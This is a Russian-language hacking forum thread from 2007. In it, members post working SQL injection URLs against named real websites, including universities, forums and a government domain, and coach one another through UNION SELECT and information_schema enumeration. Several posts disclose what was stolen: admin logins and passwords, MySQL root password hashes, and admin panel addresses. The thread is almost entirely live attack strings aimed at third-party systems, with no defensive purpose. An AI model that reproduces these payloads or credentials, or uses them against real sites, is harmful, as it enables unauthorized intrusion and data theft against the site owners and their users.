Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.06.2007, 11:11
|
|
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
Провел на форуме:
2902967
Репутация:
413
|
|
Помогите пожалуйста. Я вот с Sql не очень и такой вопрос:
Код:
http://www.southrussian.ru/dog.php?id=882'
вот здесь вылазит ошибка mysql_fetch_array() потом я пытался подобрать столбцы используя, как учили, uinion select. Так я дошел до 20 и ничего не происходит. Так вот что мне делать?) Еще я где то читал про использование order by для определения количества столбцов. Расскажите пожалуста. |
|
|
01.06.2007, 11:18
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
CRL, http://www.southrussian.ru/dog.php?id=-1+union+select+version(),2,3,4,5,6/*
http://www.southrussian.ru/dog.php?id=-1+union+select+concat(name,0x3a,password),2,3,4,5, 6+from+users/*
|
|
|
|
01.06.2007, 12:04
|
|
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
Провел на форуме:
2902967
Репутация:
413
|
|
Спасибо) У меня появился тогда еще вопрос(последний)
http://prospectus.ulster.ac.uk/course/?id=2435+UNION+select+1,2,3/*
Здесь подобрал а дальше не могу придумать, просто я совсем растение в sql.
Добавлено
На сайте про собак (southrussian.ru) логин ADMIN и пароль 123456
Последний раз редактировалось CRL; 01.06.2007 в 14:08..
|
|
|
|
01.06.2007, 12:12
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Нужно перейти к несуществующим значениям ID, т.е -2435
и подобрать имя таблицы
Код:
http://prospectus.ulster.ac.uk/course/?id=-2435+UNION+select+1,2,3+from+user/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
01.06.2007, 12:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
forum.sunrise.ru
Код:
http://forum.sunrise.ru/forum.asp?FORUM_ID=36+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('jiaozhu','FORUM_REPLY','FORUM_TOPICS','t_jiaozhu','FORUM_MODERATOR','FORUM_ALLOWED_MEMBERS','dtproperties','FORUM_TOTALS','FORUM_CATEGORY','FORUM_MEMBERS','FORUM_FORUM','FORUM_CONFIG'))--
Yfi4hevSMS:Admin
админка:
Код:
http://forum.sunrise.ru/admin_login.asp
mmis.umt.edu
Код:
http://mmis.umt.edu/CCFacil.asp?cName=Missoula&Type=County&Number=4'+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('m_LogBuySpecies','syssegments','sysconstraints','m_LogBuy','ca_history','ca_holding','ca_lendar','ca_eventtype','dtproperties','ca_topictype','m_Activities','cm_city','m_BBER','m_changeLog','m_contacts','m_contacttype','m_EvalSurvey','m_CURFORMailList','m_equipprocess','m_facil_hold','m_contacts_hold','m_facilprod','m_inputdist','m_groups','m_LogPriceMailList','m_NAICS','m_Outlook03','m_outputdist','m_PrimBus','m_inputs','m_prod_hold','m_products','m_productstatus','m_SecondaryWoodSurvey2005','m_facility','m_SpecialtyLogMailList','m_vwcertNameAbbrev','m_TechList','m_vwcerts','m_VWCONTACTS','m_vwequipprocess','m_vwfacility','m_vwfacilprod','m_VWForAccess','m_vwinputs','m_SIC','m_vwLogBuySpecies','m_vwlogbuy','m_vwTechList','mf_globals','mID_vwContacts','mID_vwfacilprod','r_db','mID_vwfacility','r_orgtype','r_keywords','r_vwdb','m_SenateFinance1','r_services','m_certs','cm_county'))--
chslovo.com
Код:
http://www.chslovo.com/include/output_articles.asp?Id=1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('articles','Ans','Que','Site_Articles','Site_Articles1','Site_Forum_A_TOPICS','Site_Forum_ALLOWED_MEMBERS','Site_Forum_CATEGORY','Site_Forum_CONFIG_NEW','Site_Forum_FORUM','Site_Forum_A_REPLY','Site_Forum_GROUPS','Site_Forum_GROUP_NAMES','Site_Forum_MEMBERS','Site_Forum_MEMBERS_PENDING','Site_Forum_MODERATOR','Site_Forum_REPLY','Quiz','Site_Forum_SUBSCRIPTIONS','Site_Forum_TOPICS','Site_Forum_TOTALS','Site_Numbers','Site_numbers1','Site_Rubrics','Site_Pictures','Site_Users','Site_Users_Conf','Site_Texts','Site_Users_Privs','Site_Users_Emails','View_Adv_Search','sysconstraints','syssegments','t_jiaozhu','D99_Tmp','dtproperties'))--
admin:ghjcnjnfr
http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать
тут нету иньекции... вывод ошибки не sql.
посл. вывод вывод в ссылке:
Код:
http://webmascon.com/archive/topic.asp?id=-1+union+select+1,2,3,version(),database(),6,user()/*
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
01.06.2007, 13:39
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
http://www.tehorng.com/
Код:
http://www.tehorng.com/release.php?release=-11959+union+select+1,2,3,4,user(),password,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26+from+mysql.user/*
User:tehorng
Password(хеш): *5837662AE1DB0E6C8864BF4F5F3600EA202395E1
http://www.gamerevolution.com
Код:
http://www.gamerevolution.com/manifesto/view.php?id=-264+union+select+1,2,user(),version(),5,6,7,8,9,10,11/*
|
|
|
|
01.06.2007, 14:47
|
|
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
Провел на форуме:
2902967
Репутация:
413
|
|
Вот здесь даже подобрал и даже версию и имя админа узнал а дальше(((
matrix_user@localhost
4.1.21-standard-log
Код:
http://www.matrixpack.ee/?go=gallery&g=21+union+select+1/*
А вот еще
Код:
http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,7,8,9,10/*
Только не уверен что подобрал правильное количество - но это единственное что вызывало хоть что-нибудь кроме ошибки.
Последний раз редактировалось CRL; 01.06.2007 в 15:09..
|
|
|
|
01.06.2007, 16:56
|
|
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338
Репутация:
165
|
|
Сообщение от CRL
Вот здесь даже подобрал и даже версию и имя админа узнал а дальше(((
matrix_user@localhost
4.1.21-standard-log
Код:
http://www.matrixpack.ee/?go=gallery&g=21+union+select+1/*
А вот еще
Код:
http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,7,8,9,10/*
Только не уверен что подобрал правильное количество - но это единственное что вызывало хоть что-нибудь кроме ошибки. databse: nuke
version: 4.1.20-log
user: root
pass: * D4BBC2141A32BB10BC1641424058A822737B0876
Код:
http://www.illukavv.ee/download.php?op=modifydownloadrequest&lid=34+union+select+1,2,3,4,5,6,database(),version(),user(),password+from+mysql.user
|
|
|
|
01.06.2007, 18:40
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
Код:
http://www.tyndall.ac.uk/generate/staffprint/staff-view.php?id=-1+UNION+SELECT+1,2,3,4/*
Код:
http://gopanthers.fit.edu/sports_info/view.php?id=-11+UNION+SELECT+1,2,3,4/*
Код:
http://www.ecodefense.ru/view.php?id=-431+ORDER+BY+11/*
Код:
http://www.tam.ca.gov/view.php?id=-14+UNION+SELECT+1,2,3,4/*
Код:
http://www.b-connect.ru/view.php?cid=111'
просто ошыбка, ищо непроверял на инж. если есть иекцыя то можно будет посидень на чужом компе=)
http://www.ccp-austria.at/view.php?id=52'
Notice: Undefined offset: 0 in D:\Inetpub\wwwroot\www.ccp-austria.at\view.php on line 213 |
|
|
|
01.06.2007, 19:41
|
|
Познающий
Регистрация: 28.12.2006
Сообщений: 44
Провел на форуме:
119257
Репутация:
56
|
|
Сайты кланов Великой игры , КОМБАТСРУ
Чем паролики зашифрованы ? MD4 (base64) ??
http://www.sdb-clan.ru/?p=comment&id=-1+union+select+1,2,concat(login,0x3a,email,0x3a,pa ss)+from+user/*
и ещё
http://mbclan.org/index.php?page=comments&id=-1+union+select+1,2,3,database(),5/*
Edited by ice1k:
- не стоило писать 7ым размером шрифта: "Сайты кланов Великой игры , КОМБАТСРУ" - это всего лишь сайт отдельного клана.
Последний раз редактировалось ice1k; 01.06.2007 в 21:32..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
